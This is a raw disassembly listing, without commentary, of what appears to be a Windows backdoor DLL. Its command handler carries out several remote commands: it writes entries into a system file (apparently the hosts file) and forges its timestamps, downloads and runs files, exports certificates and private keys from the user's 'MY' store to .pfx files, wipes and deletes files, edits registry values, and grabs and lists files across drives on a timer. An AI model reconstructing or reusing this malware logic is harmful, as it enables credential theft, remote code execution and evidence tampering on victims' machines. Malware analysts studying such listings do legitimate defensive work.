push offset aParam2 ; "param2"
push 0
push offset aCommand_2 ; "command"
lea edx, [ebp+var_8E4]
push edx
lea ecx, [ebp+var_2BC]
call sub_1001A97C
mov [ebp+var_908], eax
mov eax, [ebp+var_908]
mov [ebp+var_90C], eax
mov byte ptr [ebp+var_4], 4
mov ecx, [ebp+var_90C]
call sub_1001A9E3
push eax ; lpString2
lea ecx, [ebp+String2]
push ecx ; lpString1
call ds:lstrcpyA ; lstrcpyA
mov byte ptr [ebp+var_4], 0
lea ecx, [ebp+var_8E4]
call sub_1001A728
push 0
push 0
push offset aCommand_3 ; "command"
lea edx, [ebp+var_8E8]
push edx
lea ecx, [ebp+var_2BC]
call sub_1001A97C
mov [ebp+var_910], eax
mov eax, [ebp+var_910]
mov [ebp+var_914], eax
mov byte ptr [ebp+var_4], 5
mov ecx, [ebp+var_914]
call sub_1001A79B
mov byte ptr [ebp+var_4], 0
lea ecx, [ebp+var_8E8]
call sub_1001A728
push 1 ; Memory
push 0 ; int
lea ecx, [ebp+Filename]
push ecx ; Str
lea ecx, [ebp+var_2BC]
call sub_10018AC6
push offset aHst ; "hst"
lea edx, [ebp+Str]
push edx ; Str
call ds:_strlwr ; _strlwr
add esp, 4
push eax ; lpString1
call ds:lstrcmpA ; lstrcmpA
test eax, eax
jnz loc_1000A802
push 0FFh ; uSize
lea eax, [ebp+FileName]
push eax ; lpBuffer
call ds:GetSystemDirectoryA ; GetSystemDirectoryA
push offset dword_10034264 ; Dest
mov ecx, off_10022030
push ecx ; int
mov edx, off_100220C8
push edx ; Str
call sub_100010BB
add esp, 0Ch
push eax ; lpString2
lea eax, [ebp+FileName]
push eax ; lpString1
call ds:lstrcatA ; lstrcatA
push 0 ; hTemplateFile
push 0 ; dwFlagsAndAttributes
push 4 ; dwCreationDisposition
push 0 ; lpSecurityAttributes
push 1 ; dwShareMode
push 40000000h ; dwDesiredAccess
lea ecx, [ebp+FileName]
push ecx ; lpFileName
call ds:CreateFileA ; CreateFileA
mov [ebp+hObject], eax
cmp [ebp+hObject], 0FFFFFFFFh
jz loc_1000A802
push 2 ; dwMoveMethod
push 0 ; lpDistanceToMoveHigh
push 0 ; lDistanceToMove
mov edx, [ebp+hObject]
push edx ; hFile
call ds:SetFilePointer ; SetFilePointer
push 0 ; lpOverlapped
lea eax, [ebp+NumberOfBytesWritten]
push eax ; lpNumberOfBytesWritten
push 2 ; nNumberOfBytesToWrite
push offset asc_1002308C ; "\r\n"
mov ecx, [ebp+hObject]
push ecx ; hFile
call ds:WriteFile ; WriteFile
push 0 ; lpOverlapped
lea edx, [ebp+NumberOfBytesWritten]
push edx ; lpNumberOfBytesWritten
lea eax, [ebp+Buffer]
push eax ; lpString
call ds:lstrlenA ; lstrlenA
push eax ; nNumberOfBytesToWrite
lea ecx, [ebp+Buffer]
push ecx ; lpBuffer
mov edx, [ebp+hObject]
push edx ; hFile
call ds:WriteFile ; WriteFile
push 0 ; lpOverlapped
lea eax, [ebp+NumberOfBytesWritten]
push eax ; lpNumberOfBytesWritten
push 7 ; nNumberOfBytesToWrite
push offset asc_10023090 ; " "
mov ecx, [ebp+hObject]
push ecx ; hFile
call ds:WriteFile ; WriteFile
push 0 ; lpOverlapped
lea edx, [ebp+NumberOfBytesWritten]
push edx ; lpNumberOfBytesWritten
lea eax, [ebp+String2]
push eax ; lpString
call ds:lstrlenA ; lstrlenA
push eax ; nNumberOfBytesToWrite
lea ecx, [ebp+String2]
push ecx ; lpBuffer
mov edx, [ebp+hObject]
push edx ; hFile
call ds:WriteFile ; WriteFile
push offset CreationTime ; lpLastWriteTime
push offset CreationTime ; lpLastAccessTime
push offset CreationTime ; lpCreationTime
mov eax, [ebp+hObject]
push eax ; hFile
call ds:SetFileTime ; SetFileTime
mov ecx, [ebp+hObject]
push ecx ; hObject
call ds:CloseHandle ; CloseHandle
loc_1000A802: ; CODE XREF: sub_1000A318+3B4�j
; sub_1000A318+41E�j
push offset aGet ; "get"
lea edx, [ebp+Str]
push edx ; Str
call ds:_strlwr ; _strlwr
add esp, 4
push eax ; lpString1
call ds:lstrcmpA ; lstrcmpA
test eax, eax
jz short loc_1000A848
push offset aRun ; "run"
lea eax, [ebp+Str]
push eax ; Str
call ds:_strlwr ; _strlwr
add esp, 4
push eax ; Str1
call strcmp ; strcmp
add esp, 8
test eax, eax
jnz loc_1000A8FF
loc_1000A848: ; CODE XREF: sub_1000A318+508�j
push 0FFh ; nSize
lea ecx, [ebp+FileName]
push ecx ; lpFilename
push offset aMs32clod_7 ; "ms32clod"
call ds:GetModuleHandleA ; GetModuleHandleA
push eax ; hModule
call ds:GetModuleFileNameA ; GetModuleFileNameA
push 5Ch ; Ch
lea edx, [ebp+FileName]
push edx ; Str
call ds:strrchr ; strrchr
add esp, 8
mov byte ptr [eax+1], 0
lea eax, [ebp+String2]
push eax ; lpString
call ds:lstrlenA ; lstrlenA
test eax, eax
jz short loc_1000A8A3
lea ecx, [ebp+String2]
push ecx ; lpString2
lea edx, [ebp+FileName]
push edx ; lpString1
call ds:lstrcatA ; lstrcatA
jmp short loc_1000A8CB
; ---------------------------------------------------------------------------
loc_1000A8A3: ; CODE XREF: sub_1000A318+573�j
push offset dword_10034264 ; Dest
mov eax, off_10022030
push eax ; int
mov ecx, off_1002205C
push ecx ; Str
call sub_100010BB
add esp, 0Ch
push eax ; lpString2
lea edx, [ebp+FileName]
push edx ; lpString1
call ds:lstrcatA ; lstrcatA
loc_1000A8CB: ; CODE XREF: sub_1000A318+589�j
push 5 ; int
push 0 ; Source
lea eax, [ebp+FileName]
push eax ; lpFileName
mov ecx, [ebp+lpBuffer]
push ecx ; lpBuffer
lea edx, [ebp+Buffer]
push edx ; lpString2
call sub_10005E66
add esp, 14h
mov [ebp+lpBuffer], eax
mov eax, [ebp+lpBuffer]
push eax ; Memory
call ds:free ; free
add esp, 4
loc_1000A8FF: ; CODE XREF: sub_1000A318+52A�j
push offset aRun_0 ; "run"
lea ecx, [ebp+Str]
push ecx ; Str
call ds:_strlwr ; _strlwr
add esp, 4
push eax ; lpString1
call ds:lstrcmpA ; lstrcmpA
test eax, eax
jnz short loc_1000A973
push offset aShell32 ; "shell32"
call ds:LoadLibraryA ; LoadLibraryA
mov hModule, eax
push offset dword_10034264 ; Dest
mov edx, off_10022030
push edx ; int
mov eax, off_10022064
push eax ; Str
call sub_100010BB
add esp, 0Ch
push eax ; lpProcName
mov ecx, hModule
push ecx ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_1006A8F8, eax
push 1
push 0
push 0
lea edx, [ebp+FileName]
push edx
push 0
push 0
call dword_1006A8F8
loc_1000A973: ; CODE XREF: sub_1000A318+605�j
push offset aExport ; "export"
lea eax, [ebp+Str]
push eax ; Str
call ds:_strlwr ; _strlwr
add esp, 4
push eax ; lpString1
call ds:lstrcmpA ; lstrcmpA
test eax, eax
jnz loc_1000AA7C
push 0FFh ; Size
call ds:malloc ; malloc
add esp, 4
mov dword_10053DD8, eax
push offset a_pfx ; ".pfx"
mov ecx, dword_10053DD8
push ecx ; lpString1
call ds:lstrcpyA ; lstrcpyA
push offset dword_100739A0
push offset dword_100739A4
push offset aMy ; "MY"
call sub_1000E66B
add esp, 0Ch
mov edx, dword_10034234
mov eax, lpBuffer[edx*4]
push eax ; lpBuffer
push 0FFh ; nBufferLength
call ds:GetTempPathA ; GetTempPathA
push 5Ch ; Ch
mov ecx, dword_10034234
mov edx, lpBuffer[ecx*4]
push edx ; Str
call ds:strrchr ; strrchr
add esp, 8
mov byte ptr [eax], 0
push offset dword_10034264 ; Dest
mov eax, off_10022030
push eax ; int
mov ecx, off_10022050
push ecx ; Str
call sub_100010BB
add esp, 0Ch
push eax
push offset byte_1006A924
push offset aSS_11 ; "%s%s"
lea edx, [ebp+var_28C]
push edx ; Dest
call ds:sprintf ; sprintf
add esp, 10h
push 0 ; dwMilliseconds
lea eax, [ebp+var_28C]
push eax ; lpString2
push 1 ; int
push offset dword_10053DD8 ; int
mov ecx, dword_10034234
mov edx, lpBuffer[ecx*4]
push edx ; Str
call sub_10007B34
add esp, 14h
mov eax, dword_10053DD8
push eax ; Memory
call ds:free ; free
add esp, 4
mov dword_10053DD8, 0
loc_1000AA7C: ; CODE XREF: sub_1000A318+679�j
push offset aReset ; "reset"
lea ecx, [ebp+Str]
push ecx ; Str
call ds:_strlwr ; _strlwr
add esp, 4
push eax ; lpString1
call ds:lstrcmpA ; lstrcmpA
test eax, eax
jnz loc_1000AB67
lea edx, [ebp+hKey]
push edx ; phkResult
push 0F003Fh ; samDesired
push 0 ; ulOptions
push offset dword_10034264 ; Dest
mov eax, off_10022030
push eax ; int
mov ecx, off_10022044
push ecx ; Str
call sub_100010BB
add esp, 0Ch
push eax ; lpSubKey
push 80000002h ; hKey
call ds:RegOpenKeyExA ; RegOpenKeyExA
test eax, eax
jnz loc_1000AB67
push offset ValueName ; "f"
mov edx, [ebp+hKey]
push edx ; hKey
call ds:RegDeleteValueA ; RegDeleteValueA
push offset aU ; "u"
mov eax, [ebp+hKey]
push eax ; hKey
call ds:RegDeleteValueA ; RegDeleteValueA
push offset aG ; "g"
mov ecx, [ebp+hKey]
push ecx ; hKey
call ds:RegDeleteValueA ; RegDeleteValueA
push offset aS_1 ; "s"
mov edx, [ebp+hKey]
push edx ; hKey
call ds:RegDeleteValueA ; RegDeleteValueA
push offset aIl ; "il"
mov eax, [ebp+hKey]
push eax ; hKey
call ds:RegDeleteValueA ; RegDeleteValueA
push offset aIln ; "iln"
mov ecx, [ebp+hKey]
push ecx ; hKey
call ds:RegDeleteValueA ; RegDeleteValueA
push offset aGl ; "gl"
mov edx, [ebp+hKey]
push edx ; hKey
call ds:RegDeleteValueA ; RegDeleteValueA
mov eax, [ebp+hKey]
push eax ; hKey
call ds:RegCloseKey ; RegCloseKey
loc_1000AB67: ; CODE XREF: sub_1000A318+782�j
; sub_1000A318+7BE�j
push offset aKill ; "kill"
lea ecx, [ebp+Str]
push ecx ; Str
call ds:_strlwr ; _strlwr
add esp, 4
push eax ; lpString1
call ds:lstrcmpA ; lstrcmpA
test eax, eax
jnz loc_1000AD03
mov [ebp+var_8D4], 0
mov ecx, 0FFh
xor eax, eax
lea edi, [ebp+var_8D3]
rep stosd
stosw
stosb
push 80h ; dwFileAttributes
push offset dword_10034264 ; Dest
mov edx, off_10022030
push edx ; int
mov eax, off_10022074
push eax ; Str
call sub_100010BB
add esp, 0Ch
push eax ; lpFileName
call ds:SetFileAttributesA ; SetFileAttributesA
push 0 ; hTemplateFile
push 0 ; dwFlagsAndAttributes
push 2 ; dwCreationDisposition
push 0 ; lpSecurityAttributes
push 7 ; dwShareMode
push 0C0000000h ; dwDesiredAccess
push offset dword_10034264 ; Dest
mov ecx, off_10022030
push ecx ; int
mov edx, off_10022074
push edx ; Str
call sub_100010BB
add esp, 0Ch
push eax ; lpFileName
call ds:CreateFileA ; CreateFileA
mov [ebp+hFile], eax
push 0 ; lpOverlapped
lea eax, [ebp+var_4D4]
push eax ; lpNumberOfBytesWritten
push 400h ; nNumberOfBytesToWrite
lea ecx, [ebp+var_8D4]
push ecx ; lpBuffer
mov edx, [ebp+hFile]
push edx ; hFile
call ds:WriteFile ; WriteFile
mov eax, [ebp+hFile]
push eax ; hObject
call ds:CloseHandle ; CloseHandle
push offset dword_10034264 ; Dest
mov ecx, off_10022030
push ecx ; int
mov edx, off_10022074
push edx ; Str
call sub_100010BB
add esp, 0Ch
push eax ; lpFileName
call ds:DeleteFileA ; DeleteFileA
push 80h ; dwFileAttributes
push offset dword_10034264 ; Dest
mov eax, off_10022030
push eax ; int
mov ecx, off_10022070
push ecx ; Str
call sub_100010BB
add esp, 0Ch
push eax ; lpFileName
call ds:SetFileAttributesA ; SetFileAttributesA
push 0 ; hTemplateFile
push 0 ; dwFlagsAndAttributes
push 2 ; dwCreationDisposition
push 0 ; lpSecurityAttributes
push 7 ; dwShareMode
push 0C0000000h ; dwDesiredAccess
push offset dword_10034264 ; Dest
mov edx, off_10022030
push edx ; int
mov eax, off_10022070
push eax ; Str
call sub_100010BB
add esp, 0Ch
push eax ; lpFileName
call ds:CreateFileA ; CreateFileA
mov [ebp+hFile], eax
push 0 ; lpOverlapped
lea ecx, [ebp+var_4D4]
push ecx ; lpNumberOfBytesWritten
push 400h ; nNumberOfBytesToWrite
lea edx, [ebp+var_8D4]
push edx ; lpBuffer
mov eax, [ebp+hFile]
push eax ; hFile
call ds:WriteFile ; WriteFile
mov ecx, [ebp+hFile]
push ecx ; hObject
call ds:CloseHandle ; CloseHandle
push offset dword_10034264 ; Dest
mov edx, off_10022030
push edx ; int
mov eax, off_10022070
push eax ; Str
call sub_100010BB
add esp, 0Ch
push eax ; lpFileName
call ds:DeleteFileA ; DeleteFileA
call sub_1000579B
loc_1000AD03: ; CODE XREF: sub_1000A318+86D�j
push offset aReboot ; "reboot"
lea ecx, [ebp+Str]
push ecx ; Str
call ds:_strlwr ; _strlwr
add esp, 4
push eax ; lpString1
call ds:lstrcmpA ; lstrcmpA
test eax, eax
jnz short loc_1000AD28
call sub_1000579B
loc_1000AD28: ; CODE XREF: sub_1000A318+A09�j
push offset aSelfk ; "selfk"
lea edx, [ebp+Str]
push edx ; Str
call ds:_strlwr ; _strlwr
add esp, 4
push eax ; Str1
call strcmp ; strcmp
add esp, 8
test eax, eax
jnz short loc_1000AD6D
push 1 ; int
mov eax, off_10022040
push eax ; Source
mov ecx, lpValueName
push ecx ; lpValueName
mov edx, off_10022038
push edx ; Str
push 80000002h ; hKey
call sub_10002C3D
add esp, 14h
loc_1000AD6D: ; CODE XREF: sub_1000A318+A30�j
push offset aGrabf ; "grabf"
lea eax, [ebp+Str]
push eax ; Str
call ds:_strlwr ; _strlwr
add esp, 4
push eax ; lpString1
call ds:lstrcmpA ; lstrcmpA
test eax, eax
jnz loc_1000AE3D
push 4008h ; Size
call ds:malloc ; malloc
add esp, 4
mov lpParameter, eax
push 0FFh ; Size
call ds:malloc ; malloc
add esp, 4
mov dword_10057ED8, eax
lea ecx, [ebp+Buffer]
push ecx ; lpString2
mov edx, dword_10057ED8
push edx ; lpString1
call ds:lstrcpyA ; lstrcpyA
push 1000h ; Size
push offset dword_10057ED8 ; Src
mov eax, lpParameter
push eax ; Dst
call memcpy ; memcpy
add esp, 0Ch
mov ecx, lpParameter
mov dword ptr [ecx+4004h], 0
push 0FFh ; Size
call ds:malloc ; malloc
add esp, 4
mov edx, lpParameter
mov [edx+4000h], eax
push offset byte_100739A8 ; Source
mov eax, lpParameter
mov ecx, [eax+4000h]
push ecx ; Dest
call strcpy ; strcpy
add esp, 8
push 0 ; lpThreadId
push 0 ; dwCreationFlags
mov edx, lpParameter
push edx ; lpParameter
push offset sub_1000B027 ; lpStartAddress
push 0 ; dwStackSize
push 0 ; lpThreadAttributes
call ds:CreateThread ; CreateThread
loc_1000AE3D: ; CODE XREF: sub_1000A318+A73�j
push offset aHrdlst ; "hrdlst"
lea eax, [ebp+Str]
push eax ; Str
call ds:_strlwr ; _strlwr
add esp, 4
push eax ; lpString1
call ds:lstrcmpA ; lstrcmpA
test eax, eax
jnz loc_1000AF3A
push 4008h ; Size
call ds:malloc ; malloc
add esp, 4
mov lpParameter, eax
push 0FFh ; Size
call ds:malloc ; malloc
add esp, 4
mov dword_10057ED8, eax
push 0FFh ; Size
push 0 ; Val
mov ecx, dword_10057ED8
push ecx ; Dst
call memset ; memset
add esp, 0Ch
push 1000h ; Size
push offset dword_10057ED8 ; Src
mov edx, lpParameter
push edx ; Dst
call memcpy ; memcpy
add esp, 0Ch
mov eax, lpParameter
mov dword ptr [eax+4004h], 3
push 0FFh ; Size
call ds:malloc ; malloc
add esp, 4
mov ecx, lpParameter
mov [ecx+4000h], eax
push 0FFh ; Size
push 0 ; Val
mov edx, lpParameter
mov eax, [edx+4000h]
push eax ; Dst
call memset ; memset
add esp, 0Ch
push 0FFFFFFFFh ; int
mov ecx, lpParameter
mov edx, [ecx+4000h]
push edx ; Dest
push offset asc_10023124 ; " "
push offset a20 ; "%20"
lea eax, [ebp+Buffer]
push eax ; lpString2
call sub_100012D1
add esp, 14h
push 0 ; lpThreadId
push 0 ; dwCreationFlags
mov ecx, lpParameter
push ecx ; lpParameter
push offset sub_1000B027 ; lpStartAddress
push 0 ; dwStackSize
push 0 ; lpThreadAttributes
call ds:CreateThread ; CreateThread
loc_1000AF3A: ; CODE XREF: sub_1000A318+B43�j
jmp loc_1000A4EB
; ---------------------------------------------------------------------------
loc_1000AF3F: ; CODE XREF: sub_1000A318+1CD�j
; sub_1000A318+1E5�j
lea edx, [ebp+Filename]
push edx ; lpFileName
call ds:DeleteFileA ; DeleteFileA
loc_1000AF4C: ; CODE XREF: sub_1000A318+167�j
mov [ebp+var_8EC], 1
mov [ebp+var_4], 0FFFFFFFFh
lea ecx, [ebp+var_2BC]
call sub_1001A728
mov eax, [ebp+var_8EC]
mov ecx, [ebp+var_C]
mov large fs:0, ecx
pop edi
mov esp, ebp
pop ebp
retn 4
sub_1000A318 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; void __stdcall sub_1000AF7F(HWND, UINT, UINT_PTR, DWORD)
sub_1000AF7F proc near ; DATA XREF: sub_1000AF7F+26�o
; sub_1000C9DC+18C�o
push ebp
mov ebp, esp
mov eax, dword_100241D4
push eax ; uIDEvent
push 0 ; hWnd
call ds:KillTimer ; KillTimer
push 0 ; lpThreadId
push 0 ; dwCreationFlags
push 0 ; lpParameter
push offset sub_1000A318 ; lpStartAddress
push 0 ; dwStackSize
push 0 ; lpThreadAttributes
call ds:CreateThread ; CreateThread
push offset sub_1000AF7F ; lpTimerFunc
push 57E40h ; uElapse
push 0 ; nIDEvent
push 0 ; hWnd
call ds:SetTimer ; SetTimer
mov dword_100241D4, eax
pop ebp
retn 10h
sub_1000AF7F endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
call sub_10001DE0
pop ebp
retn 10h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+8]
mov [ebp-4], eax
loc_1000AFD8: ; CODE XREF: .text:1000AFEB�j
mov ecx, [ebp+8]
movsx edx, byte ptr [ecx]
mov eax, [ebp+8]
add eax, 1
mov [ebp+8], eax
test edx, edx
jz short loc_1000AFED
jmp short loc_1000AFD8
; ---------------------------------------------------------------------------
loc_1000AFED: ; CODE XREF: .text:1000AFE9�j
; .text:1000B00C�j
mov ecx, [ebp+8]
sub ecx, 1
mov [ebp+8], ecx
mov edx, [ebp+8]
cmp edx, [ebp-4]
jz short loc_1000B00E
mov eax, [ebp+8]
movsx ecx, byte ptr [eax]
movsx edx, byte ptr [ebp+0Ch]
cmp ecx, edx
jz short loc_1000B00E
jmp short loc_1000AFED
; ---------------------------------------------------------------------------
loc_1000B00E: ; CODE XREF: .text:1000AFFC�j
; .text:1000B00A�j
mov eax, [ebp+8]
movsx ecx, byte ptr [eax]
movsx edx, byte ptr [ebp+0Ch]
cmp ecx, edx
jnz short loc_1000B021
mov eax, [ebp+8]
jmp short loc_1000B023
; ---------------------------------------------------------------------------
loc_1000B021: ; CODE XREF: .text:1000B01A�j
xor eax, eax
loc_1000B023: ; CODE XREF: .text:1000B01F�j
mov esp, ebp
pop ebp
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; DWORD __stdcall sub_1000B027(LPVOID)
sub_1000B027 proc near ; DATA XREF: sub_1000A318+B16�o
; sub_1000A318+C13�o ...
var_8238 = dword ptr -8238h
var_8234 = dword ptr -8234h
var_8230 = dword ptr -8230h
var_822C = dword ptr -822Ch
var_422C = dword ptr -422Ch
FileName = byte ptr -4228h
var_4227 = byte ptr -4227h
PerformanceCount= LARGE_INTEGER ptr -4128h
Memory = dword ptr -4120h
String2 = byte ptr -120h
var_11F = byte ptr -11Fh
Dst = byte ptr -20h
var_1F = byte ptr -1Fh
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 8238h
call __alloca_probe
push edi
mov [ebp+FileName], 0
mov ecx, 3Fh
xor eax, eax
lea edi, [ebp+var_4227]
rep stosd
stosw
mov [ebp+String2], 0
mov ecx, 3Fh
xor eax, eax
lea edi, [ebp+var_11F]
rep stosd
stosw
mov [ebp+Dst], 0
mov ecx, 7
xor eax, eax
lea edi, [ebp+var_1F]
rep stosd
stosw
stosb
lea eax, [ebp+PerformanceCount]
push eax ; lpPerformanceCount
call ds:QueryPerformanceCounter ; QueryPerformanceCounter
mov ecx, dword ptr [ebp+PerformanceCount]
push ecx ; Seed
call ds:srand ; srand
add esp, 4
push 0FFh ; uSize
lea edx, [ebp+FileName]
push edx ; lpBuffer
call ds:GetSystemDirectoryA ; GetSystemDirectoryA
push 6 ; int
mov eax, off_10022114
push eax ; int
lea ecx, [ebp+Dst]
push ecx ; Dst
call sub_1000274A
add esp, 0Ch
lea edx, [ebp+Dst]
push edx
lea eax, [ebp+FileName]
push eax
push offset aSS_tmp ; "%s\\%s.tmp"
lea ecx, [ebp+FileName]
push ecx ; Dest
call ds:sprintf ; sprintf
add esp, 10h
lea edx, [ebp+FileName]
push edx ; lpFileName
call ds:DeleteFileA ; DeleteFileA
mov [ebp+var_422C], 0
push 400h ; Size
call ds:malloc ; malloc
add esp, 4
mov ecx, [ebp+var_422C]
mov [ebp+ecx*4+Memory], eax
mov edx, [ebp+arg_0]
mov eax, [edx+4000h]
push eax ; Str
call strlen ; strlen
add esp, 4
test eax, eax
jbe short loc_1000B145
mov ecx, [ebp+arg_0]
mov edx, [ecx+4000h]
push edx ; Source
mov eax, [ebp+var_422C]
mov ecx, [ebp+eax*4+Memory]
push ecx ; Dest
call strcpy ; strcpy
add esp, 8
jmp short loc_1000B160
; ---------------------------------------------------------------------------
loc_1000B145: ; CODE XREF: sub_1000B027+FA�j
push offset aC_0 ; "c:"
mov edx, [ebp+var_422C]
mov eax, [ebp+edx*4+Memory]
push eax ; Dest
call strcpy ; strcpy
add esp, 8
loc_1000B160: ; CODE XREF: sub_1000B027+11C�j
push offset dword_10034264 ; Dest
mov ecx, off_10022030
push ecx ; int
mov edx, off_10022050
push edx ; Str
call sub_100010BB
add esp, 0Ch
push eax
push offset byte_1006A924
push offset aSS_12 ; "%s%s"
lea eax, [ebp+String2]
push eax ; Dest
call ds:sprintf ; sprintf
add esp, 10h
push 0Ah ; dwMilliseconds
lea ecx, [ebp+FileName]
push ecx ; lpFileName
lea edx, [ebp+String2]
push edx ; lpString2
mov eax, [ebp+arg_0]
mov ecx, [eax+4004h]
push ecx ; int
mov edx, [ebp+arg_0]
push edx ; int
mov eax, [ebp+var_422C]
push eax ; int
lea ecx, [ebp+var_822C]
push ecx ; int
lea edx, [ebp+Memory]
push edx ; int
mov eax, [ebp+var_422C]
mov ecx, [ebp+eax*4+Memory]
push ecx ; Str
call sub_1000741F
add esp, 24h
mov edx, [ebp+arg_0]
mov eax, [edx+4000h]
push eax ; Str
call strlen ; strlen
add esp, 4
test eax, eax
jnz loc_1000B29C
mov [ebp+var_422C], 0
push offset aD_1 ; "d:"
mov ecx, [ebp+var_422C]
mov edx, [ebp+ecx*4+Memory]
push edx ; Dest
call strcpy ; strcpy
add esp, 8
push offset dword_10034264 ; Dest
mov eax, off_10022030
push eax ; int
mov ecx, off_10022050
push ecx ; Str
call sub_100010BB
add esp, 0Ch
push eax
push offset byte_1006A924
push offset aSS_13 ; "%s%s"
lea edx, [ebp+String2]
push edx ; Dest
call ds:sprintf ; sprintf
add esp, 10h
push 0Ah ; dwMilliseconds
lea eax, [ebp+FileName]
push eax ; lpFileName
lea ecx, [ebp+String2]
push ecx ; lpString2
mov edx, [ebp+arg_0]
mov eax, [edx+4004h]
push eax ; int
mov ecx, [ebp+arg_0]
push ecx ; int
mov edx, [ebp+var_422C]
push edx ; int
lea eax, [ebp+var_822C]
push eax ; int
lea ecx, [ebp+Memory]
push ecx ; int
mov edx, [ebp+var_422C]
mov eax, [ebp+edx*4+Memory]
push eax ; Str
call sub_1000741F
add esp, 24h
loc_1000B29C: ; CODE XREF: sub_1000B027+1CC�j
mov ecx, [ebp+var_422C]
mov edx, [ebp+ecx*4+Memory]
push edx ; Memory
call ds:free ; free
add esp, 4
mov eax, [ebp+arg_0]
cmp dword ptr [eax+4004h], 3
jnz loc_1000B4C9
mov [ebp+var_8230], 0
loc_1000B2CD: ; CODE XREF: sub_1000B027+2D1�j
mov ecx, [ebp+var_8230]
cmp dword_1004B770[ecx*4], 0
jz short loc_1000B2FA
cmp [ebp+var_8230], 1000h
jnb short loc_1000B2FA
mov edx, [ebp+var_8230]
add edx, 1
mov [ebp+var_8230], edx
jmp short loc_1000B2CD
; ---------------------------------------------------------------------------
loc_1000B2FA: ; CODE XREF: sub_1000B027+2B4�j
; sub_1000B027+2C0�j
push 310h ; Size
call ds:malloc ; malloc
add esp, 4
mov ecx, [ebp+var_8230]
mov dword_1004B770[ecx*4], eax
push offset dword_10034264 ; Dest
mov edx, off_10022030
push edx ; int
mov eax, off_10022050
push eax ; Str
call sub_100010BB
add esp, 0Ch
push eax
push offset byte_1006A924
push offset aSS_14 ; "%s%s"
lea ecx, [ebp+String2]
push ecx ; Dest
call ds:sprintf ; sprintf
add esp, 10h
lea edx, [ebp+String2]
push edx ; lpString2
mov eax, [ebp+var_8230]
mov ecx, dword_1004B770[eax*4]
push ecx ; lpString1
call ds:lstrcpyA ; lstrcpyA
mov edx, [ebp+var_8230]
mov eax, dword_1004B770[edx*4]
mov dword ptr [eax+100h], 0
mov ecx, [ebp+var_8230]
mov edx, dword_1004B770[ecx*4]
mov dword ptr [edx+104h], 0
lea eax, [ebp+FileName]
push eax ; lpString2
mov ecx, [ebp+var_8230]
mov edx, dword_1004B770[ecx*4]
add edx, 108h
push edx ; lpString1
call ds:lstrcpyA ; lstrcpyA
mov [ebp+var_8234], 0
jmp short loc_1000B3CF
; ---------------------------------------------------------------------------
loc_1000B3C0: ; CODE XREF: sub_1000B027:loc_1000B442�j
mov eax, [ebp+var_8234]
add eax, 1
mov [ebp+var_8234], eax
loc_1000B3CF: ; CODE XREF: sub_1000B027+397�j
mov ecx, [ebp+arg_0]
mov edx, [ecx+4000h]
push edx ; Str
call strlen ; strlen
add esp, 4
cmp [ebp+var_8234], eax
jnb short loc_1000B447
mov eax, [ebp+arg_0]
mov ecx, [eax+4000h]
mov edx, [ebp+var_8234]
movsx eax, byte ptr [ecx+edx]
mov [ebp+var_8238], eax
mov ecx, [ebp+var_8238]
sub ecx, 20h
mov [ebp+var_8238], ecx
cmp [ebp+var_8238], 3Ch
ja short loc_1000B442
mov eax, [ebp+var_8238]
xor edx, edx
mov dl, ds:byte_1000B4F9[eax]
jmp ds:off_1000B4F1[edx*4]
loc_1000B42F: ; DATA XREF: .text:off_1000B4F1�o
mov ecx, [ebp+arg_0]
mov edx, [ecx+4000h]
mov eax, [ebp+var_8234]
mov byte ptr [edx+eax], 23h
loc_1000B442: ; CODE XREF: sub_1000B027+3F1�j
; sub_1000B027+401�j
; DATA XREF: ...
jmp loc_1000B3C0
; ---------------------------------------------------------------------------
loc_1000B447: ; CODE XREF: sub_1000B027+3C0�j
mov ecx, [ebp+arg_0]
mov edx, [ecx+4000h]
push edx
push offset byte_10065ED8
push offset aS__S_lst_file ; "%s__%s.lst.file"
mov eax, [ebp+var_8230]
mov ecx, dword_1004B770[eax*4]
add ecx, 207h
push ecx ; Dest
call ds:sprintf ; sprintf
add esp, 10h
mov edx, [ebp+var_8230]
mov eax, dword_1004B770[edx*4]
mov ecx, [ebp+var_8230]
mov [eax+308h], ecx
mov edx, [ebp+var_8230]
mov eax, dword_1004B770[edx*4]
mov dword ptr [eax+30Ch], 1
push 0 ; lpThreadId
push 0 ; dwCreationFlags
mov ecx, [ebp+var_8230]
mov edx, dword_1004B770[ecx*4]
push edx ; lpParameter
push offset StartAddress ; lpStartAddress
push 0 ; dwStackSize
push 0 ; lpThreadAttributes
call ds:CreateThread ; CreateThread
loc_1000B4C9: ; CODE XREF: sub_1000B027+296�j
push 3 ; int
push offset a1 ; "1"
push offset aS_2 ; "s"
mov eax, off_10022044
push eax ; Str
push 80000002h ; hKey
call sub_10002C3D
add esp, 14h
xor eax, eax
pop edi
mov esp, ebp
pop ebp
retn 4
sub_1000B027 endp
; ---------------------------------------------------------------------------
off_1000B4F1 dd offset loc_1000B42F ; DATA XREF: sub_1000B027+401�r
dd offset loc_1000B442
byte_1000B4F9 db 0 ; DATA XREF: sub_1000B027+3FB�r
; ---------------------------------------------------------------------------
add [ecx], eax
add [ecx], eax
add [ecx], eax
add [ecx], eax
add [ecx], eax
add [ecx], eax
add [ecx], eax
add [ecx], eax
add [ecx], eax
add [ecx], eax
add [ecx], eax
add [ecx], eax
add [eax], eax
add [ecx], eax
add [ecx], eax
add [ecx], al
add [ecx], eax
add [ecx], eax
add [ecx], eax
add [ecx], eax
add [ecx], eax
add [ecx], eax
add [ecx], eax
add [ecx], eax
add [ecx], eax
add [ecx], eax
add [ecx], eax
add [ecx], eax
add [ecx], eax
add [eax], eax
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000B536 proc near ; CODE XREF: sub_1000B7EF:loc_1000B97B�p
; sub_10016C4C:loc_10016FEC�p
Buffer = byte ptr -320h
String1 = byte ptr -31Ch
var_31B = byte ptr -31Bh
PerformanceCount= LARGE_INTEGER ptr -21Ch
FileName = byte ptr -214h
var_213 = byte ptr -213h
Dest = byte ptr -114h
var_113 = byte ptr -113h
hObject = dword ptr -14h
var_10 = dword ptr -10h
NumberOfBytesWritten= dword ptr -0Ch
CreationTime = _FILETIME ptr -8
push ebp
mov ebp, esp
sub esp, 320h
push edi
mov [ebp+String1], 0
mov ecx, 3Fh
xor eax, eax
